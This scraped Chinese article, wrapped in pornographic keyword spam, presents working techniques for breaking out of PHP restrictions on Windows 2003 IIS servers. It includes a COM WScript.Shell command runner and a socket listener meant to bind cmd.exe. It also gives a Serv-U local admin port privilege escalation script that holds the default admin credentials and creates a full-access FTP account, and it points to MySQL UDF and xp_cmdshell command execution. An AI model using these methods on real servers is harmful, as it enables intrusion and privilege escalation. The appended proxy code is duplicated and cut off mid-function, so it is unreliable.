亚洲精品久久久中文字幕-亚洲精品久久片久久-亚洲精品久久青草-亚洲精品久久婷婷爱久久婷婷-亚洲精品久久午夜香蕉

您的位置:首頁技術文章
文章詳情頁

突破Windows 2003 PHP服務器的新思路

瀏覽:3日期:2024-02-09 18:26:11

從WIN2000到WIN XP, 再到WIN2003, MS IIS服務器安全性的提高是顯而易見的。 在WIN2000中, 一個普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也無法用system() 等函數執行系統命令, 但是我們還能用com()函數進行突破;到WIN 2003,即使IIS 和PHP都是默認安裝,你用system(), com()也可能拿它沒轍。這時候你就不得不使用一些新的方法來進行突破了。;1、disable_functions的突破

在php -4.0.1以上的版本,php.ini里引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執行這些函數的時候將會提示Warning: system() has been disabled for security reasons,同時程序終止運行。但是也不是沒有辦法執行系統命令了。因為php采用了很多perl的特性,比如還可以用(`)來執行命令,示例代碼如下:

<?$output = `ls -al`;echo '<pre>$output</pre>';?>

據說這個只有設成safe_mode為on才能避免,但上次我在一臺國外的服務器上使用的時候還是失敗了,人并不是什么時候都能那么走運的:)

2、dl()函數的應用

當任何PHP的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用于safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調用W32api 函數,可惜這個擴展已被移動到 PECL 庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊里的例子:

// 加載此擴展

dl('php_w32api.dll');

// 注冊 GetTickCount 函數,來自 kernel32.dll

w32api_register_function('kernel32.dll',

'GetTickCount',

'long');

// 注冊 MessageBoxA 函數,來自 User32.dll

w32api_register_function('User32.dll',

'MessageBoxA',

'long');

// 取得開機時間信息

$ticks = GetTickCount();

// 轉換為易于理解的文本

$secs = floor($ticks / 1000);

$mins = floor($secs / 60);

$hours = floor($mins / 60);

$str = sprintf('You have been using your computer for:'.

'rn %d Milliseconds, or rn %d Seconds'.

'or rn %d mins orrn %d hours %d mins.',

$ticks,

$secs,

$mins,

$hours,

$mins - ($hours*60));

// 顯示一個消息對話框,只有一個 OK 按鈕和上面的開機時間文本

MessageBoxA(NULL,

$str,

'Uptime Information',

MB_OK);

?>

可惜我還沒有理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導讀者。

3、COM 和 .Net(Windows)函數的應用

COM(Component Object Model,組件對象模型)是微軟開發的軟件規范,它用于開發面向對象的、編譯好的軟件組件,它允許把軟件抽象成為二進制的部件,主要運用于windows平臺。

PHP 的 Windows 版本已經內置該擴展模塊的支持。無需加載任何附加擴展庫即可使用COM函數。它的使用方法類似于C++或Java中類的創建的語法,并把COM的類名作為參數傳遞到構造函數。例如使用在PHP中調用“WScript.Shell”執行系統命令:

$cmd=” E:/cert/admin/psexec.exe”;

if($com=new COM('WScript.Shell')) echo 'yes';

if(!$cmd1=$com->exec($cmd))

{

echo 'can not exec()';

}

if(!$cmd2=$cmd1->stdout())

{

echo 'can not stdout()';

}

if(!$cmd3=$cmd2->readall())

{

echo 'can not readall()';

}

echo $cmd3;

?>

圖1是我寫的一個執行psexec.exe的一個例子。

這段代碼與ASP的的意思是一模一樣的,當然,你也可以像ASP那樣調用“ADODB.Connection”,利用這個組件結合jet2溢出漏洞,可能能夠在PHP Saft mode=ON下拿到一個Shell。

//create the database connection

$conn = new COM('ADODB.Connection');

$dsn = 'DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=' . realpath('mydb.mdb');

$conn->Open($dsn);

//pull the data through SQL string

$rs = $conn->Execute('select clients from web');

…..

?>

.Net 函數只能運行在 PHP 5上,當然,它需要 “.Net runtime”的支持,而且這的PHP的一個實驗性模塊,功能還未齊全,所以在這就不討論了。

4、Java()函數的應用

該方法適用于safe mode=on。要使用JAVA模塊服務器必須事先安裝Java虛擬機,而且在PHP安裝配置的時候打開了with-java的選項,代碼如下:

[JAVA]

;這是到php_java.jar的路徑

;java.class.path = .php_java.jar

;JDK的路徑

;Java.home = f:jdk1.3.0

;到虛擬機的路徑

;Java.library=f:jdk1.3.0jrebinhostspotjvm.dll

同COM一樣,使用Java創建類(不僅僅是JavaBeans)只需把JAVA的類名作為參數傳遞到構造函數。以下是手冊里邊的一個例子:

// This example is only intended to be run as a CGI.

$frame = new Java('java.awt.Frame', 'PHP');

$button = new Java('java.awt.Button', 'Hello Java World!');

$frame->add('North', $button);

$frame->validate();

$frame->pack();

$frame->visible = True;

$thread = new Java('java.lang.Thread');

$thread->sleep(10000);

$frame->dispose();

?>

可惜能真正支持JAVA的PHP服務器并不多見,所以在這也不多討論了。

5、socket()函數的應用

socket 是PHP中功能極為強大的一個模塊,如果你使用高級的、抽象的接口(由fsockopen()和psockopen函數打開的socket),是不需要打開“php_sockets.dll”的。但是如果要使用完整的socket函數塊,就必須在php.ini這樣設置:

;Windows Extensions

;Note that MySQL and ODBC support is now built in, so no dll is needed for it.

……..

;去掉以下一句最前邊的分號

;extension=php_sockets.dll

使用PHP的socket函數塊可以實現端口轉發/重定向、數據包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 還可以用它構造TCP/UDP服務器, 同時, 我覺得它也是突破服務器安全策略的一個最好的辦法。以下便是一個在服務器上打開端口構造TCP服務器的例子,你可以用它來捆綁上服務器的cmd.exe:

//在服務器上構造TCP服務

//該例子需要php_sockets.dll的支持

//執行后便可使用” telnet 127.0.0.1 1020”連接

error_reporting(E_ALL);

/* Allow the script to hang around waiting for connections. */

set_time_limit(0);

/* Turn on implicit output flushing so we see what we're getting

* as it comes in. */

ob_implicit_flush();

//在服務器上綁定IP和端口

$address = '127.0.0.1';

$port = 1020;

if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {

echo 'socket_create() failed: reason: ' . socket_strerror($sock) . 'n';

}

if (($ret = socket_bind($sock, $address, $port)) < 0) {

echo 'socket_bind() failed: reason: ' . socket_strerror($ret) . 'n';

}

if (($ret = socket_listen($sock, 5)) < 0) {

echo 'socket_listen() failed: reason: ' . socket_strerror($ret) . 'n';

}

do {

if (($msgsock = socket_accept($sock)) < 0) {

echo 'socket_accept() failed: reason: ' . socket_strerror($msgsock) . 'n';

break;

}

/* Send instructions. */

$msg = 'nWelcome to the PHP Test Server. n' .

'To quit, type 'quit'. To shut down the server type 'shutdown'.n';

socket_write($msgsock, $msg, strlen($msg));

do {

if (false === socket_recv($msgsock, $buf , 1024, 0)) {

echo 'socket_read() failed: reason: ' . socket_strerror($ret) . 'n';

break 2;

}

if (!$buf = trim($buf)) {

continue;

}

if ($buf == 'quit') {

break;

}

if ($buf == 'shutdown') {

socket_close($msgsock);

break 2;

}

$talkback = 'PHP: You said '$buf'.n';

socket_write($msgsock, $talkback, strlen($talkback));

echo '$bufn';

//以下處理接受到的buf

/*eg:例如

$buf=”cmd.exe /c netstat –an”;

$pp = popen('$buf ', 'r');

While($read = fgets($pp, 2096))

echo $read;

pclose($pp);

*/

} while (true);

socket_close($msgsock);

} while (true);

socket_close($sock);

?>

事實上,很多主機都是沒有加載php_sockets.dll的,慶幸的是,不需要socket模塊支持的“fsockopen”函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀寫本機中未對外部開放的端口。使用fsockopen讀寫serv-u 的本地管理端口43958 (注: 該端口無法在外部連結) 進行提權便是一個很典型的例子:

$adminuser=” LocalAdministrator”;

$adminpass=” #l@$ak#.lk;0@P”;

$adminport=” 43958”;

$fp = fsockopen ('127.0.0.1',$adminport,$errno, $errstr, 8);

if (!$fp) {

echo '$errstr ($errno)

n';

} else {

//可以寫入$shellcode

// fputs ($fp, $shellcode);

fputs ($fp, 'USER '.$adminuser.'rn');

sleep (1);

fputs ($fp, 'PASS '.$adminpass.'rn');

sleep (1);

fputs ($fp, 'SITE MAINTENANCErn');

sleep (1);

fputs ($fp, '-SETUSERSETUPrn');

fputs ($fp, '-IP='.$addr.'rn');

fputs ($fp, '-PortNo='.$ftpport.'rn');

fputs ($fp, '-User='.$user.'rn');

fputs ($fp, '-Password='.$password.'rn');

fputs ($fp, '-HomeDir='.$homedir.'rn');

fputs ($fp, '-LoginMesFile=rn');

fputs ($fp, '-Disable=0rn');

fputs ($fp, '-RelPaths=0rn');

fputs ($fp, '-NeedSecure=0rn');

fputs ($fp, '-HideHidden=0rn');

fputs ($fp, '-AlwaysAllowLogin=0rn');

fputs ($fp, '-ChangePassword=1rn');

fputs ($fp, '-QuotaEnable=0rn');

fputs ($fp, '-MaxUsersLoginPerIP=-1rn');

fputs ($fp, '-SpeedLimitUp=-1rn');

fputs ($fp, '-SpeedLimitDown=-1rn');

fputs ($fp, '-MaxNrUsers=-1rn');

fputs ($fp, '-IdleTimeOut=600rn');

fputs ($fp, '-SessionTimeOut=-1rn');

fputs ($fp, '-Expire=0rn');

fputs ($fp, '-RatioUp=1rn');

fputs ($fp, '-RatioDown=1rn');

fputs ($fp, '-RatiosCredit=0rn');

fputs ($fp, '-QuotaCurrent=0rn');

fputs ($fp, '-QuotaMaximum=0rn');

fputs ($fp, '-Maintenance=Systemrn');

fputs ($fp, '-PasswordType=Regularrn');

fputs ($fp, '-Ratios=Nonern');

fputs ($fp, ' Access='.$homedir.'|RWAMELCDPrn');

fputs ($fp, 'QUITrn');

sleep (1);

while (!feof($fp)) {

echo fgets ($fp,128);

}

}

?>

還可以利用fsockopen編寫HTTP代理,從而訪問外網或本機中無法外部訪問的網站。我手上有一個完整的HTTPProxy(圖4),代碼較長。有興趣的讀者可以看看。

6、MYSQL/MSSQL接口

不同于linux的是,windows下的mysql/MSSQL一般是以系統管理員身份運行的,因此,只要能拿到本機SQL數據庫中的root/sa密碼,你就可以直接用PHP連接數據庫來執行系統命令。

在Mysql中執行系統命令要利用用戶自定義函數“MySQL UDF Dynamic Library”這個漏洞。在MSSQL中只要連接上數據庫,就能直接調用“master..xp_cmdshell“擴展執行命令,權限當然是system權限。

總結一下:由于系統、IIS、PHP的版本不一樣,以上提到的幾個突破方法可能會有所變化,PHP還有許多擴展功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全策略的限制!

后面附上proxy.php的代碼

error_reporting(E_ALL);

/*

// This program is free software; you can redistribute it and/or

// modify it under the terms of the GNU General Public License

// as published by the Free Software Foundation; either version 2

// of the License, or (at your option) any later version.

//

// This program is distributed in the hope that it will be useful,

// but WITHOUT ANY WARRANTY; without even the implied warranty of

// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

// GNU General Public License for more details.

//

// You should have received a copy of the GNU General Public License

// along with this program; if not, write to the Free Software

// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

//-------------------------------------------------------------------

// Class: PHProxy

// Author: ultimategamer00 (Abdullah A.)

// Last Modified: 6:28 PM 6/22/2004

*/

function __stripslashes($str)

{

return get_magic_quotes_gpc() ? stripslashes($str) : $str;

}

if (!function_exists('str_rot13'))

{

function str_rot13($str)

{

static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',

'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');

return strtr($str, $alpha[0], $alpha[1]);

}

}

class PHProxy

{

var $allowed_hosts = array();

var $version;

var $script_url;

var $url;

var $url_segments;

var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);

var $socket;

var $content_type;

var $request_headers;

var $post_body;

var $response_headers;

var $response_body;

function PHProxy($flags = 'previous')

{

$this->version = '0.2';

$this->script_url = 'http'

. (isset(

function set_request_headers()

{

$headers = ' ' . (isset($this->url_segments['query']) ? '?' : '') . ' HTTP/1.0rn';

$headers .= 'Host: :rn';

$headers .= 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn';

$headers .= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1rn';

$headers .= 'Connection: closern';

if ($this->flags['show_referer'] == 1)

{

$headers .= 'Referer: rn';

}

$cookies = $this->get_cookies();

$headers .= $cookies != '' ? 'Cookie: $cookiesrn' : '';

if (

function set_request_headers()

{

$headers = ' ' . (isset($this->url_segments['query']) ? '?' : '') . ' HTTP/1.0rn';

$headers .= 'Host: :rn';

$headers .= 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)rn';

$headers .= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1rn';

$headers .= 'Connection: closern';

if ($this->flags['show_referer'] == 1)

{

$headers .= 'Referer: rn';

}

$cookies = $this->get_cookies();

$headers .= $cookies != '' ? 'Cookie: $cookiesrn' : '';

if (

標簽: PHP
主站蜘蛛池模板: 国产精品毛片在线更新 | 国产高清xxxsexvideo | 亚洲精品香蕉一区二区 | 欧美大片天天免费看视频 | 中国美女一级黄色片 | 欧美特黄特色aaa大片免费看 | 精品视频在线观看 | 国产区成人综合色在线 | 亚洲美女色在线欧洲美女 | 欧美国产激情二区三区 | 免费观看a黄一级视频 | 黄色毛片视频免费 | 看草逼 | 久久久久久久久久久9精品视频 | 免费观看亚洲 | 亚洲国产日韩在线成人蜜芽 | 亚洲播播播 | 成人做爰网站免费看 | 免费一级欧美片在线观免看 | 亚洲黄色中文字幕 | 日韩在线一区高清在线 | 国产精品www| 521色香蕉网在线观看免费 | 狠狠色狠狠色综合婷婷tag | japanese色系国产在线高清 | 国产成人精品免费视频网页大全 | 精品国产中文一级毛片在线看 | 国产成人高清亚洲一区91 | 国产精品欧美亚洲韩国日本不卡 | 国产女主播真实视频在线观看 | 最新黄色地址 | 37pao成人国产永久免费视频 | 我想看黄色一级片 | va视频在线观看 | 欧美一级特黄特黄毛片 | 国产精品成人一区二区不卡 | 婷婷在线五月 | 国产成人在线网址 | 最新亚洲人成网站在线影院 | 欧美毛片免费观看 | 99久久精品免费看国产 |